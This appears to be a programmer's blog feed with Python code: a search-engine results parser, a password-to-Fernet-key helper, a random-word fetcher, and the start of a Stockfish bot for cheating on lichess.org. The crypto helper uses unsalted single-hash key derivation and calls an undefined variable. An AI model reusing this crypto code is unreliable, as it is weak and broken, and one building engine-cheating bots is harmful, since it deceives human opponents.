<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">result_type</span><span class="p">]</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">serp_result</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">after_parsing</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Sublcass specific behaviour after parsing happened.</span>
<span class="sd"> Override in subclass to add search engine specific behaviour.</span>
<span class="sd"> Commonly used to clean the results.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Return a nicely formated overview of the results."""</span>
<span class="k">return</span> <span class="n">pprint</span><span class="o">.</span><span class="n">pformat</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">)</span>
<span class="sd">"""</span>
<span class="sd">Here follow the different classes that provide CSS selectors </span>
<span class="sd">for different types of SERP pages of several common search engines.</span>
<span class="sd">Just look at them and add your own selectors in a new class if you</span>
<span class="sd">want the Scraper to support them.</span>
<span class="sd">You can easily just add new selectors to a search engine. Just follow</span>
<span class="sd">the attribute naming convention and the parser will recognize them:</span>
<span class="sd">If you provide a dict with a name like finance_search_selectors,</span>
<span class="sd">then you're adding a new search type with the name finance.</span>
<span class="sd">Each class needs a attribute called num_results_search_selectors, that</span>
<span class="sd">extracts the number of searches that were found by the keyword.</span>
<span class="sd">"""</span>
<span class="k">class</span> <span class="nc">GoogleParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Google search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">,</span> <span class="s1">'image'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'div#resultStats'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#center_col'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.g '</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.s span.st::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">},</span>
<span class="s1">'ads_main'</span> <span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#center_col'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.ads-ad'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.s span.st::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3.r > a:first-child::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'.ads-visurl cite::text'</span><span class="p">,</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">image_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'li#isr_mc'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'div.rg_di'</span><span class="p">,</span>
<span class="s1">'imgurl'</span><span class="p">:</span> <span class="s1">'a.rg_l::attr(href)'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="fm">__init__</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">after_parsing</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Clean the urls.</span>
<span class="sd"> A typical scraped results looks like the following:</span>
<span class="sd"> '/url?q=http://www.youtube.com/user/Apple&sa=U&ei=lntiVN7JDsTfPZCMgKAO&ved=0CFQQFjAO&usg=AFQjCNGkX65O-hKLmyq1FX9HQqbb9iYn9A'</span>
<span class="sd"> Clean with a short regex.</span>
<span class="sd"> """</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="n">after_parsing</span><span class="p">()</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="nb">list</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">item</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">value</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">and</span> <span class="n">item</span><span class="p">[</span><span class="s1">'link'</span><span class="p">]:</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'/url\?q=(?P.*?)&sa=U&ei='</span><span class="p">,</span> <span class="n">item</span><span class="p">[</span><span class="s1">'link'</span><span class="p">])</span>
<span class="k">if</span> <span class="n">result</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_results</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">i</span><span class="p">][</span><span class="s1">'link'</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'url'</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">YandexParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Yandex search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'div.serp-list'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'div.serp-item__wrap '</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'a.serp-item__title-link::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.serp-item__text::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'a.serp-item__title-link::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'a.serp-url__link::attr(href)'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">BingParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Bing search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'.sb_count'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'ol#b_results'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.b_algo'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.b_title > h2 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.b_snippet > p::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.b_title > h2 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">},</span>
<span class="s1">'ads_main'</span> <span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'ol#b_results'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'li.b_ad'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.sb_add > h2 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.b_caption::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.sb_add > h2 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'cite::text'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">YahooParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Yahoo search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'#pg > span:last-child'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#main'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.res'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'div > h3 > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'div.abstr::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'div > h3 > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'span.url::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">BaiduParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Baidu search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="s1">'#container .nums'</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#content_left'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.result-op'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'h3 > a.t::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'.c-abstract::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'h3 > a.t::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'span.c-showurl::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">class</span> <span class="nc">DuckduckgoParser</span><span class="p">(</span><span class="n">Parser</span><span class="p">):</span>
<span class="sd">"""Parses SERP pages of the Duckduckgo search engine."""</span>
<span class="n">search_types</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'normal'</span><span class="p">]</span>
<span class="n">num_results_search_selectors</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">normal_search_selectors</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'container'</span><span class="p">:</span> <span class="s1">'#links'</span><span class="p">,</span>
<span class="s1">'result_container'</span><span class="p">:</span> <span class="s1">'.result'</span><span class="p">,</span>
<span class="s1">'link'</span><span class="p">:</span> <span class="s1">'.result__title > a::attr(href)'</span><span class="p">,</span>
<span class="s1">'snippet'</span><span class="p">:</span> <span class="s1">'result__snippet::text'</span><span class="p">,</span>
<span class="s1">'title'</span><span class="p">:</span> <span class="s1">'.result__title > a::text'</span><span class="p">,</span>
<span class="s1">'visible_link'</span><span class="p">:</span> <span class="s1">'.result__url__domain::text'</span>
<span class="p">},</span>
<span class="p">}</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="sd">"""Originally part of https://github.com/NikolaiT/GoogleScraper.</span>
<span class="sd"> Only for testing purposes: May be called directly with an search engine </span>
<span class="sd"> search url. For example:</span>
<span class="sd"> python3 parsing.py 'http://yandex.ru/yandsearch?text=GoogleScraper&lr=178&csg=82%2C4317%2C20%2C20%2C0%2C0%2C0'</span>
<span class="sd"> Please note: Using this module directly makes little sense, because requesting such urls</span>
<span class="sd"> directly without imitating a real browser (which is done in my GoogleScraper module) makes</span>
<span class="sd"> the search engines return crippled html, which makes it impossible to parse.</span>
<span class="sd"> But for some engines it nevertheless works (for example: yandex, google, ...).</span>
<span class="sd"> """</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">,</span> <span class="s1">'Usage: </span><span class="si">{}</span><span class="s1"> url'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">raw_html</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span><span class="o">.</span><span class="n">text</span>
<span class="n">parser</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http[s]?://www\.google'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">GoogleParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://yandex\.ru'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">YandexParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://www\.bing\.'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">BingParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http[s]?://search\.yahoo.'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">YahooParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^http://www\.baidu\.com'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">BaiduParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^https://duckduckgo\.com'</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">DuckduckgoParser</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">parser</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'/tmp/testhtml.html'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">of</span><span class="p">:</span>
<span class="n">of</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">raw_html</span><span class="p">)</span>
</code></pre></div>
<h3>What you can expect in the near future from GoogleScaper?</h3>
<p>I am quite excited to develop some new features for GoogleScraper:</p>
<ol>
<li>Comple documentation and hosting it on
<a href="https://readthedocs.org/" title="readthedocs">readthedocs</a>.</li>
<li>Asynchroneous support for massive parallel scraping with 1000
proxies and up. I don't know yet what framework to use. Maybe
Twisted or something more low level (libevent, epoll, ...)</li>
<li>SqlAlchemy integration. I am really excited about that.</li>
<li>Cleaner API.</li>
<li>Complete configuration for all search engine parameters.</li>
<li>Many examples that show how to use GoogleScraper effectively</li>
</ol>
<p>Many thanks for your patience and time!<br>
Nikolai</p>Using the Python cryptography module with custom passwords2014-10-19T11:50:00+02:002014-10-19T11:50:00+02:00Nikolai Tschachertag:incolumitas.com,2014-10-19:/2014/10/19/using-the-python-cryptography-module-with-custom-passwords/<p>Hey all</p>
<p>I recently discovered a <a href="https://cryptography.io/en/latest/" title="cryptography">quite cute crypto
module</a> for Python.
It is divided in two logical security layers. The first
(<a href="https://cryptography.io/en/latest/fernet/" title="Fernet">Fernet</a>) can be
used by cryptology unaware programmers in a way that makes it unlikely
to introduce any security flaws. The seconds layer (called
<a href="https://cryptography.io/en/latest/hazmat/primitives/" title="hazmat">Hazmat</a>)
allows access to all kinds of cryptographical primitives, such as HMACS
and asymmetric encryption functions.</p>
<h3>The Problem</h3>
<p>Normally you don't want to use primitives, because it is tricky to do
correct (event for advanced programmers). But unfortunately the secure
and simple API functionality Fernet:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="kn">from</span> <span class="nn">cryptography.fernet</span> <span class="kn">import</span> <span class="n">Fernet</span>
<span class="o">>>></span> <span class="n">key</span> <span class="o">=</span> <span class="n">Fernet</span><span class="o">.</span><span class="n">generate_key</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="sa">b</span><span class="s2">"my deep dark secret"</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span>
<span class="s1">'...'</span>
<span class="o">>>></span> <span class="n">f</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>
<span class="s1">'my deep dark secret</span>
</code></pre></div>
<p>suffers from the huge inconvenience that you need to store (or
imagine:remember!) a 32 byte key in order to decrypt the tokens that
Fernet outputs.<br>
It would be much more convenient to just pass a password to Fernet
which in turn makes a 32 byte, Base 64 encoded encryption token out of
it. Of course your own<br>
password is much less secure then 32 bytes from <code>os.urandom(32)</code>, but
at least it is somehow usable.</p>
<p>So I came up …</p><p>Hey all</p>
<p>I recently discovered a <a href="https://cryptography.io/en/latest/" title="cryptography">quite cute crypto
module</a> for Python.
It is divided in two logical security layers. The first
(<a href="https://cryptography.io/en/latest/fernet/" title="Fernet">Fernet</a>) can be
used by cryptology unaware programmers in a way that makes it unlikely
to introduce any security flaws. The seconds layer (called
<a href="https://cryptography.io/en/latest/hazmat/primitives/" title="hazmat">Hazmat</a>)
allows access to all kinds of cryptographical primitives, such as HMACS
and asymmetric encryption functions.</p>
<h3>The Problem</h3>
<p>Normally you don't want to use primitives, because it is tricky to do
correct (event for advanced programmers). But unfortunately the secure
and simple API functionality Fernet:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="kn">from</span> <span class="nn">cryptography.fernet</span> <span class="kn">import</span> <span class="n">Fernet</span>
<span class="o">>>></span> <span class="n">key</span> <span class="o">=</span> <span class="n">Fernet</span><span class="o">.</span><span class="n">generate_key</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="sa">b</span><span class="s2">"my deep dark secret"</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">token</span>
<span class="s1">'...'</span>
<span class="o">>>></span> <span class="n">f</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>
<span class="s1">'my deep dark secret</span>
</code></pre></div>
<p>suffers from the huge inconvenience that you need to store (or
imagine:remember!) a 32 byte key in order to decrypt the tokens that
Fernet outputs.<br>
It would be much more convenient to just pass a password to Fernet
which in turn makes a 32 byte, Base 64 encoded encryption token out of
it. Of course your own<br>
password is much less secure then 32 bytes from <code>os.urandom(32)</code>, but
at least it is somehow usable.</p>
<p>So I came up with this little extra code to use Fernet with a custom
password:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">from</span> <span class="nn">cryptography.fernet</span> <span class="kn">import</span> <span class="n">Fernet</span>
<span class="kn">from</span> <span class="nn">cryptography.hazmat.primitives</span> <span class="kn">import</span> <span class="n">hashes</span>
<span class="kn">from</span> <span class="nn">cryptography.hazmat.backends</span> <span class="kn">import</span> <span class="n">default_backend</span>
<span class="k">def</span> <span class="nf">get_key</span><span class="p">(</span><span class="n">password</span><span class="p">):</span>
<span class="n">digest</span> <span class="o">=</span> <span class="n">hashes</span><span class="o">.</span><span class="n">Hash</span><span class="p">(</span><span class="n">hashes</span><span class="o">.</span><span class="n">SHA256</span><span class="p">(),</span> <span class="n">backend</span><span class="o">=</span><span class="n">default_backend</span><span class="p">())</span>
<span class="n">digest</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
<span class="k">return</span> <span class="n">base64</span><span class="o">.</span><span class="n">urlsafe_b64encode</span><span class="p">(</span><span class="n">digest</span><span class="o">.</span><span class="n">finalize</span><span class="p">())</span>
<span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">get_key</span><span class="p">(</span><span class="n">key</span><span class="p">))</span>
<span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">token</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">Fernet</span><span class="p">(</span><span class="n">get_key</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
<span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">token</span><span class="p">))</span>
</code></pre></div>
<p>I hope it helps anybody!</p>Beautiful, beautiful python2014-07-11T19:35:00+02:002014-07-11T19:35:00+02:00Nikolai Tschachertag:incolumitas.com,2014-07-11:/2014/07/11/beautiful-beautiful-python/<h3>Hey</h3>
<p>After a day of programming I went home to program a little bit, trying
to find a way to implement some tests for my
<a href="https://github.com/NikolaiT/GoogleScraper" title="Google Scraper on Github">GoogleScraper</a>
project, which lacked focus for a long time. I needed to have some test
data, in my case some words to search for with the above mentioned
scraper, and once more I realized how powerful Python (or any
programming language) is. This silly little code comes in handy, if
you need some random words for some testing purposes:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">random_words</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">wordlength</span><span class="o">=</span><span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">15</span><span class="p">)):</span>
<span class="sd">"""Read a random english wiki article and extract some words.</span>
<span class="sd"> Arguments:</span>
<span class="sd"> n -- The number of words to return. Returns all found ones, if n is more than we were able to found.</span>
<span class="sd"> KeywordArguments:</span>
<span class="sd"> wordlength -- A range that forces the words to have a specific length.</span>
<span class="sd"> """</span>
<span class="n">valid_words</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'[a-zA-Z]{{</span><span class="si">{}</span><span class="s1">,</span><span class="si">{}</span><span class="s1">}}'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">wordlength</span><span class="o">.</span><span class="n">start</span><span class="p">,</span> <span class="n">wordlength</span><span class="o">.</span><span class="n">stop</span><span class="p">))</span>
<span class="n">found</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">valid_words</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.wikipedia.org/wiki/Special:Random'</span><span class="p">)</span><span class="o">.</span><span class="n">text</span><span class="p">)))</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">return</span> <span class="n">found</span><span class="p">[:</span><span class="n">n</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">IndexError</span><span class="p">:</span>
<span class="k">return</span> <span class="n">found</span>
<span class="nb">print</span><span class="p">(</span><span class="n">random_words</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">random_words</span><span class="p">(</span><span class="mi">77</span><span class="p">,</span> <span class="nb">range</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="mi">26</span><span class="p">))</span>
</code></pre></div>Lichess.org chess bot!2014-04-23T18:03:00+02:002014-04-23T18:03:00+02:00Nikolai Tschachertag:incolumitas.com,2014-04-23:/2014/04/23/lichess-org-chess-bot/<p><strong>22.05.2014: Updated the bot, should work better now</strong></p>
<p>Hi everyone!</p>
<p>I was in a coding mood during Easter and decided to write a small chess
bot with
<a href="http://selenium-python.readthedocs.org/en/latest/" title="selenium python">selenium</a>
and <a href="http://stockfishchess.org/" title="stockfish engine">stockfish</a> engine to
cheat a bit on
<a href="http://en.lichess.org/" title="lichess chess arena">lichess.org</a>.</p>
<p>I think the code is pretty self explanatory and I won't discuss it in
depth here. You can tweak the config, the comments should explain what
the parameters do.</p>
<p>The config is in the beginning of the code, so modify it there. You
should maybe modify it to use your username and password. Make sure that
you download stockfish and install it. Then supply the correct path in
the 'stockfish_binary' parameter.</p>
<p>As always: Have fun!</p>
<p>Some open issues:</p>
<ul>
<li>Sometimes the last move fails because the bot won't to start a new game
before it can checkmate</li>
<li>Promoting doesn't work yet :/</li>
</ul>
<p>Here is the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">__author__</span> <span class="o">=</span> <span class="s1">'nikolai'</span>
<span class="n">__date__</span> <span class="o">=</span> <span class="s1">'Easter 2014'</span>
<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'username'</span> <span class="p">:</span> <span class="s1">'probably_a_spider'</span><span class="p">,</span> <span class="c1"># the login username</span>
<span class="s1">'password'</span> <span class="p">:</span> <span class="s1">'somepwd'</span><span class="p">,</span> <span class="c1"># the login password</span>
<span class="s1">'stockfish_binary'</span> <span class="p">:</span> <span class="s1">'/home/nikolai/PycharmProjects/LichessBot/stockfish-dd-src/src/stockfish'</span><span class="p">,</span> <span class="c1"># the path to your local stockfish binary</span>
<span class="c1">#Set to true if the bot should play forever</span>
<span class="s1">'pwn_forever'</span> <span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># if the bot should play endlessly</span>
<span class="s1">'min_per_side …</span></code></pre></div><p><strong>22.05.2014: Updated the bot, should work better now</strong></p>
<p>Hi everyone!</p>
<p>I was in a coding mood during Easter and decided to write a small chess
bot with
<a href="http://selenium-python.readthedocs.org/en/latest/" title="selenium python">selenium</a>
and <a href="http://stockfishchess.org/" title="stockfish engine">stockfish</a> engine to
cheat a bit on
<a href="http://en.lichess.org/" title="lichess chess arena">lichess.org</a>.</p>
<p>I think the code is pretty self explanatory and I won't discuss it in
depth here. You can tweak the config, the comments should explain what
the parameters do.</p>
<p>The config is in the beginning of the code, so modify it there. You
should maybe modify it to use your username and password. Make sure that
you download stockfish and install it. Then supply the correct path in
the 'stockfish_binary' parameter.</p>
<p>As always: Have fun!</p>
<p>Some open issues:</p>
<ul>
<li>Sometimes the last move fails because the bot won't to start a new game
